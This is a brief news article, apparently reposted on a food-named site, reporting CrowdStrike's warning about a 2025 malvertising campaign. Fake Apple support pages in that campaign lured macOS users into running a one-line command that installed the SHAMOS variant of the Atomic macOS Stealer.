Skip to content
Gastronomic-Paradise

Malicious fake Apple support websites aim to disseminate data-stealing malware in a targeted operation

Malicious version of Atomic macOS Stealer (AMOS) ensnares macOS users through bogus technical assistance sites within a malware advertising scheme.

 and  Administrator
1 min read
Malicious macOS support websites disguise themselves to secretly distribute infostealer software in...
Malicious macOS support websites disguise themselves to secretly distribute infostealer software in a targeted operation.

Malicious fake Apple support websites aim to disseminate data-stealing malware in a targeted operation

CrowdStrike's Counter Adversary Operations has issued a warning about a continuing trend among eCrime actors, who are likely to use both malvertising and one-line installation commands to distribute macOS information stealers.

The warning comes after CrowdStrike successfully blocked a malvertising campaign that targeted over 300 of its customer environments, with the malicious site appearing in Google search results in various locations including the UK, Japan, China, Colombia, Canada, Mexico, Italy, and others.

The sophisticated malvertising campaign, which occurred between June and August 2025, aimed to infect victims with the SHAMOS variant of the Atomic macOS Stealer (AMOS), developed by the malware-as-a-service group Cookie Spider.

Victims were diverted to fraudulent macOS help websites and encouraged to execute a malicious one-line installation command. The downloaded file, a Bash script, would then capture the user's password and download a SHAMOS Mach-O executable from a specific URL.

This technique allows cybercriminals to bypass Gatekeeper security checks and install the malware directly onto victim devices. CrowdStrike has observed eCrime threat actors using similar methods since June 2025, having previously leveraged this approach in Homebrew malvertising campaigns between May 2024 and January 2025.

The organization behind Cookie Spider is a cybercriminal group operating from Russia, known for renting out the SHAMOS stealer malware targeting macOS users worldwide through malvertising campaigns. Interestingly, no victims were located in Russia, possibly due to Russian eCrime forums prohibiting commodity malware operators from targeting users based in Russia.

CrowdStrike's assessment underscores the popularity of malicious one-line installation commands among eCrime actors. The security firm made this information public in a recent blog post, urging macOS users to be vigilant and cautious when visiting unverified websites and executing commands from unknown sources.

Read also:

Related

Latest